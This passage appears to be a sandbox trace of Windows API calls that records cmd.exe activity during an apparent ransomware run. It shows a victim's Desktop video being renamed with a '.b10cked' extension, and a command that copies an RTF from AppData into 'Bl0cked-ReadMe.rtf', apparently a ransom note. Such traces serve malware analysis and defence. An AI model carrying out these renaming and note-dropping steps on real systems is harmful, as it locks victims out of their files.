_wcsicmp (_String1="move", _String2="PATH") returned -3 [0225.411] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0225.411] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0225.411] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0225.412] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0225.412] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0225.412] _wcsicmp (_String1="move", _String2="VER") returned -9 [0225.412] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0225.412] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0225.412] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0225.412] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0225.412] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0225.412] _wcsicmp (_String1="move", _String2="START") returned -6 [0225.412] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0225.412] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0225.412] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0225.413] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.414] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.414] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af0cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af0c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af0c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.415] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0225.415] _wcsicmp (_String1="E-AGGM~1.MKV", _String2=".") returned 55 [0225.416] _wcsicmp (_String1="E-AGGM~1.MKV", _String2="..") returned 55 [0225.416] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggm~1.mkv")) returned 0x20 [0225.416] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x281e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.416] SetErrorMode (uMode=0x0) returned 0x0 [0225.416] SetErrorMode (uMode=0x1) returned 0x0 [0225.416] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", nBufferLength=0x104, lpBuffer=0x1aea54, lpFilePart=0x1aea3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", lpFilePart=0x1aea3c*="E-AGGM~1.MKV") returned 0x2a [0225.416] SetErrorMode (uMode=0x0) returned 0x1 [0225.416] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y")) returned 0x10 [0225.416] _wcsicmp (_String1="E-AGGM~1.MKV", _String2=".") returned 55 [0225.416] _wcsicmp (_String1="E-AGGM~1.MKV", _String2="..") returned 55 [0225.416] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggm~1.mkv")) returned 0x20 [0225.417] SetErrorMode (uMode=0x0) returned 0x0 [0225.417] SetErrorMode (uMode=0x1) returned 0x0 [0225.417] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", nBufferLength=0x104, lpBuffer=0x1aeed0, lpFilePart=0x1aec68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", lpFilePart=0x1aec68*="E-AGGM~1.MKV") returned 0x2a [0225.417] SetErrorMode (uMode=0x0) returned 0x1 [0225.417] SetErrorMode (uMode=0x0) returned 0x0 [0225.417] SetErrorMode (uMode=0x1) returned 0x0 [0225.417] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked", nBufferLength=0x104, lpBuffer=0x1af0d8, lpFilePart=0x1aec68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked", lpFilePart=0x1aec68*="e-AggmA P_oioCEdo08.mkv.b10cked") returned 0x3d [0225.417] SetErrorMode (uMode=0x0) returned 0x1 [0225.417] SetLastError (dwErrCode=0x0) [0225.417] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggma p_oiocedo08.mkv.b10cked")) returned 0xffffffff [0225.417] GetLastError () returned 0x2 [0225.417] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", fInfoLevelId=0x1, lpFindFileData=0x1ae5e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae5e4) returned 0x270eb0 [0225.417] FindNextFileW (in: hFindFile=0x270eb0, lpFindFileData=0x1ae5e4 | out: lpFindFileData=0x1ae5e4) returned 0 [0225.418] GetLastError () returned 0x12 [0225.418] FindClose (in: hFindFile=0x270eb0 | out: hFindFile=0x270eb0) returned 1 [0225.419] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", fInfoLevelId=0x1, lpFindFileData=0x281c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x281c08) returned 0x270eb0 [0225.419] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked", nBufferLength=0x104, lpBuffer=0x1ae87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked", lpFilePart=0x0) returned 0x3d [0225.419] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv", nBufferLength=0x104, lpBuffer=0x1ae87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv", lpFilePart=0x0) returned 0x35 [0225.419] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggma p_oiocedo08.mkv")) returned 0x20 [0225.419] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggma p_oiocedo08.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggma p_oiocedo08.mkv.b10cked"), dwFlags=0x3) returned 1 [0225.420] FindClose (in: hFindFile=0x270eb0 | out: hFindFile=0x270eb0) returned 1 [0225.420] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ae830 | out: _Buffer=" 1") returned 9 [0225.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.420] GetFileType (hFile=0x7) returned 0x2 [0225.420] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.420] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ae7bc | out: lpMode=0x1ae7bc) returned 1 [0225.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.420] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae7f0 | out: lpConsoleScreenBufferInfo=0x1ae7f0) returned 1 [0225.421] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0225.421] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x1ae830 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0225.421] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ae814, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x1ae814*=0x1a) returned 1 [0225.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.422] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.422] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.422] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.422] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.423] SetConsoleInputExeNameW () returned 0x1 [0225.423] GetConsoleOutputCP () returned 0x1b5 [0225.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.423] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.423] exit (_Code=0) Process: id = "594" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33639 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33640 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33641 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33642 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 33643 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33644 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33645 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33646 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33647 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 33648 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33789 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33790 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33791 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33792 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 33793 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 33794 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33795 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33796 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33797 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33798 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33799 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33800 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33801 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33802 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33803 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 33804 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33805 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33806 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33807 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33808 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33809 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33810 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 33811 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 33812 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 818 os_tid = 0x7f8 [0225.208] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22ff3c | out: lpSystemTimeAsFileTime=0x22ff3c*(dwLowDateTime=0xb9cbb1e0, dwHighDateTime=0x1d440a9)) [0225.208] GetCurrentProcessId () returned 0xa14 [0225.208] GetCurrentThreadId () returned 0x7f8 [0225.208] GetTickCount () returned 0x3e2df [0225.208] QueryPerformanceCounter (in: lpPerformanceCount=0x22ff34 | out: lpPerformanceCount=0x22ff34*=28199746450) returned 1 [0225.209] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.209] __set_app_type (_Type=0x1) [0225.209] __p__fmode () returned 0x76b331f4 [0225.209] __p__commode () returned 0x76b331fc [0225.209] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.209] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.209] GetCurrentThreadId () returned 0x7f8 [0225.209] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7f8) returned 0x38 [0225.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.209] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.209] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.210] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fecc | out: phkResult=0x22fecc*=0x0) returned 0x2 [0225.210] VirtualQuery (in: lpAddress=0x22ff03, lpBuffer=0x22fe9c, dwLength=0x1c | out: lpBuffer=0x22fe9c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.210] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fe9c, dwLength=0x1c | out: lpBuffer=0x22fe9c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.210] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fe9c, dwLength=0x1c | out: lpBuffer=0x22fe9c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.210] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fe9c, dwLength=0x1c | out: lpBuffer=0x22fe9c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.210] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fe9c, dwLength=0x1c | out: lpBuffer=0x22fe9c*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.210] GetConsoleOutputCP () returned 0x1b5 [0225.210] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.210] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.210] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.210] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.210] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.210] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.210] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.210] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.210] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.210] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.211] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.211] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.211] GetEnvironmentStringsW () returned 0x420178* [0225.211] FreeEnvironmentStringsW (penv=0x420178) returned 1 [0225.211] GetEnvironmentStringsW () returned 0x420178* [0225.211] FreeEnvironmentStringsW (penv=0x420178) returned 1 [0225.211] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ee3c | out: phkResult=0x22ee3c*=0x40) returned 0x0 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0xa0, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x1, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0x1, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x0, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x40, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x40, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.211] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0x40, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.211] RegCloseKey (hKey=0x40) returned 0x0 [0225.212] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ee3c | out: phkResult=0x22ee3c*=0x40) returned 0x0 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0x40, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x1, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0x1, lpcbData=0x22ee40*=0x1000) returned 0x2 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x0, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x9, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x4, lpData=0x22ee48*=0x9, lpcbData=0x22ee40*=0x4) returned 0x0 [0225.212] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee44, lpData=0x22ee48, lpcbData=0x22ee40*=0x1000 | out: lpType=0x22ee44*=0x0, lpData=0x22ee48*=0x9, 